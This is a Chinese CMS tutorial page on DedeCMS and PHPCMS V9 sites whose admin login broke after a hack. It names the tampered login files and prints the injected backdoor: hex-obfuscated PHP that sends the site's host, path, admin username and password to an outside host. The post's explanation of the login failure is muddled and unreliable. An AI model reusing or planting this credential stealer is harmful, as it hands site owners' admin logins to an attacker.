您现在的位置是:首页 > cms教程 > DedeCMS教程DedeCMS教程
织梦phpcms网站被攻击后台登录不了怎么办
春翠2023-10-07DedeCMS教程已有人查阅
导读之前发现一个服务器的所有网站都出现了后台登陆不进去的情况,本来以为是服务器内存,cpu或者宽带的原因,可是都很正常,为什么登陆不进去呢?不程序下载到本地就正常了
之前发现一个服务器的所有网站都出现了后台登陆不进去的情况,本来以为是服务器内存,cpu或者宽带的原因,可是都很正常,为什么登陆不进去呢?不程序下载到本地就正常了,真奇怪,最终找了一天终于找到了,原来是登陆文件让黑客给修改了,原来是登陆用户名密码让转码成16进制数了,php解析不了,再本地系统有默认的这个编码表,当然能解析了,所以正常;
织梦网站:/include/userlogin.class.php
Phpcms V9:/phpcms/modules/admin/index.php
找个新文件替换下就可以了;
如下是攻击代码:
织梦网站:/include/userlogin.class.php
Phpcms V9:/phpcms/modules/admin/index.php
找个新文件替换下就可以了;
如下是攻击代码:
$sqlhost = "\x77\x77\x77\x2e\x74\x68\x69\x73\x64\x6f\x6f\x72\x2e\x63\x6f\x6d";
$sqlself = "\x2f\x69\x6e\x2f\x61\x70\x69\x2e\x70\x68\x70";
$sqlself .= "\x3f\x76\x61\x72\x3d\x64\x65\x64\x65\x26\x64\x61\x74\x61\x3d";
$sqlself .= bin2hex($_SERVER["\x48\x54\x54\x50\x5f\x48\x4f\x53\x54"]).'|'.bin2hex($_SERVER["\x50\x48\x50\x5f\x53\x45\x4c\x46"]).'|';
$sqlself .= bin2hex($username).'|'.bin2hex($userpwd);
$sqlport = hexdec(50);
if(function_exists("\x66\x73\x6f\x63\x6b\x6f\x70\x65\x6e")) {
$sqlfp = @fsockopen ($sqlhost, $sqlport);
@fputs ($sqlfp, "\x47\x45\x54\x20".$sqlself."\x20\x48\x54\x54\x50\x2f\x31\x2e\x31\r\n\x48\x6f\x73\x74\x3a".$sqlhost."\r\n\x43\x6f\x6e\x6e\x65\x63\x74\x69\x6f\x6e\x3a\x20\x43\x6c\x6f\x73\x65\r\n\r\n");
@fclose ($sqlfp);
} else {
$context = array("\x68\x74\x74\x70" => array("\x6d\x65\x74\x68\x6f\x64" => "\x47\x45\x54","\x74\x69\x6d\x65\x6f\x75\x74" => 5));
if(function_exists('stream_context_create')) { $stream = @stream_context_create ($context); }
@file_get_contents ("\x68\x74\x74\x70\x3a\x2f\x2f".$sqlhost."\x3a".$sqlport.$sqlself, false, $stream);
}
本文标签:织梦cms后台
很赞哦! ()
上一篇:dedecms织梦删掉版权的方法
下一篇:织梦程序常见漏洞和解决方法
相关教程
- 织梦cms、帝国cms、PHPcms优缺点分析
- PHPCMS和织梦DEDECMS对比分析
- 织梦、phpcms程序添加ftp://、thunder://、flashget:文件下载时
- 织梦cms和PHPcms及帝国cms比较,哪个好?
- 织梦模板怎么套PHPCMS
- PHPCMS与织梦CMS有什么区别呢
- 10个常用的eyoucms易优CMS标签(织梦CMS迁移可用)的方法
- 织梦cms收费哪几款cms可以免费商用?
- dedecms织梦发布内容网站为空白的原因有哪些
- dedecms织梦程序安装后无法修改栏目的解决方法
- 织梦标签{global.cfg_templets_skin}不解析地址的解决方法
- 织梦导航栏栏目被选中状态的代码实例
图文教程
怎么解决织梦dedecms首页封面频道arclist不能显示副栏目内容
副栏目功能可以让一篇文章多个栏目同时显示,但是在首页和封面频道模板中就是无法显示副栏目的内容,尤其是子类里面选择的副栏目。
织梦dedecms设置文章推荐后在列表标题自动加粗了怎么办
DedeCMS设置了推荐属性的文章在列表页里面标题默认为加粗:那个加黑的是默认的。如果你不想要被加黑,可以做如下修改。在include文件夹里找到
dedecms文章来源和作者为空时自动隐藏字段的方法
dedecmscms后台在发布文章的时候可以让管理员填写文章来源或者作者信息,有些时候需要用到,有些时候可能就会留空,或者填写来源网络,作者匿名之类的。
dedecms友情链接怎么去掉LI标签
近做DEDECMS模版的时候,官方默认的友情连接标签{dede:flink row=’24′ type=’textall’/}解析出;来的是带LI的,但是谟设计的时候是不要LI标签的,那么该如何去做呢
相关源码
-
帝国CMS7.5二次元COS漫展网站模板源码免费下载本模板基于帝国CMS 7.5版本深度开发,为二次元文化分享领域设计。采用UTF-8编码,支持中文内容展示,特别适用于COSPLAY作品展示、漫展信息发布等二次元相关内容的网站建设。模板结构清晰,布局合理,充分考虑了二次元用户群体的浏览习惯和审美需求。查看源码 -
(PC+WAP)激光水幕音乐喷泉设备工程网站源码下载本模板基于PbootCMS系统开发,为喷泉设备工程类企业设计,特别适合展示音乐喷泉、激光水幕等水景艺术项目。采用响应式技术,确保各类工程案例在不同设备上都能呈现视觉效果。查看源码 -
(PC+WAP)门窗门业家居定制铝合金产品pbootcms模板下载基于PbootCMS内核开发的门窗门业企业专用模板,采用响应式设计结构,数据一次录入即可同步适配电脑与手机端浏览。通过简洁大气的视觉呈现,帮助门窗企业快速建立专业线上展示平台,有效传递产品价值与服务优势。查看源码 -
(自适应)互联网建站网络公司个人工作室网站模板基于PbootCMS内核开发,围绕「技术方案展示」「成功案例库」「服务流程说明」三大模块构建,支持PC与移动端数据实时同步。附带包含客户评价、行业解决方案的完整测试数据包查看源码 -
自适应容器设备机械行业通用pbootcms网站模板本模板是一款基于PbootCMS开源内核深度开发,为容器制造、容器设备、压力容器及相关行业量身打造的高品质响应式企业网站模板。查看源码 -
(自适应)蓝色环保科技设备带三级栏目网站模板下载该模板为环保科技企业设计,提供专业的产品展示与技术服务平台。采用响应式布局,适配环保设备、清洁技术等应用场景,通过可视化后台可快速搭建符合行业特性的展示网站。查看源码
| 分享笔记 (共有 篇笔记) |
